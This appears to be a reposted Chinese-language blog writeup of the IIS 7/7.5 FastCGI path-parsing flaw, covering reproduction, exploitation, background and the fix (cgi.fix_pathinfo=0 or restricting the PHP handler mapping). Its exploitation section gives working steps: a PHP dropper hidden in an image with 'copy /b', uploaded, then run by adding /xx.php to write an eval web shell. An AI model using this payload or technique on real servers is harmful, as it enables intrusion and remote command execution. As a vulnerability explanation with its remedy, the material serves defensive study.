IIS7/7.5對檔案名畸形決議
- 1??漏洞復現
- 2??利用方法
- 3??在詳細描述
- 4??解決辦法
1??漏洞復現
http://www.xxx.cn/statics/ghx/css/default1219.css/xx.php
IIS 7/7.5在Fast-CGI運行模式下,如果在一個檔案路徑(/xx.jpg)后面加上/xx.php會將/xx.jpg/xx.php 決議為 php 檔案,
2??利用方法
將一張圖和一個寫入后門代碼的文本檔案合并將惡意文本寫入圖片的二進制代碼之后,避免破壞圖片檔案頭和尾
e.g. copy xx.jpg/b + yy.txt/a xy.jpg
/b 即二進制[binary]模式
/a 即ascii模式 xx.jpg正常圖片檔案
yy.txt 內容
<?PHPfputs(fopen('shell.php','w'),'<?php eval($_POST[IIS])?>');?>
意思為寫入一個內容為 <?php eval($_POST[IIS])?> 名稱為shell.php的檔案
找個地方上傳 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php 即可執行惡意文本,
然后就在圖片目錄下生成一句話木馬 shell.php 密碼 IIS
3??在詳細描述
Microsoft Internet資訊服務(IIS)是Microsoft Windows自帶的一個網路資訊服務器,
IIS7/7.5當以CGI的方式運行PHP時,在處理PHP檔案路徑的決議時存在問題,如果網站允許上傳檔案,而且上傳檔案路徑可得到,遠程攻擊者可以利用此漏洞上傳包含惡意代碼的檔案并得到執行,實作以Web行程權限執行任意命令,
攻擊者上傳允許上傳的檔案型別,檔案中包含惡意代碼,得到上傳檔案的URL后,在其后添加任意php后綴的檔案名進行訪問,會把上傳的檔案作為CGI腳本執行,
4??解決辦法
增強IIS設定,在IIS里找到“處理程式映射”,然后對PHP這一項進行編輯,將映射調整為僅限檔案,或則在php.ini中修改為cgi.fix_pathinfo = 0 ,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/293885.html
標籤:其他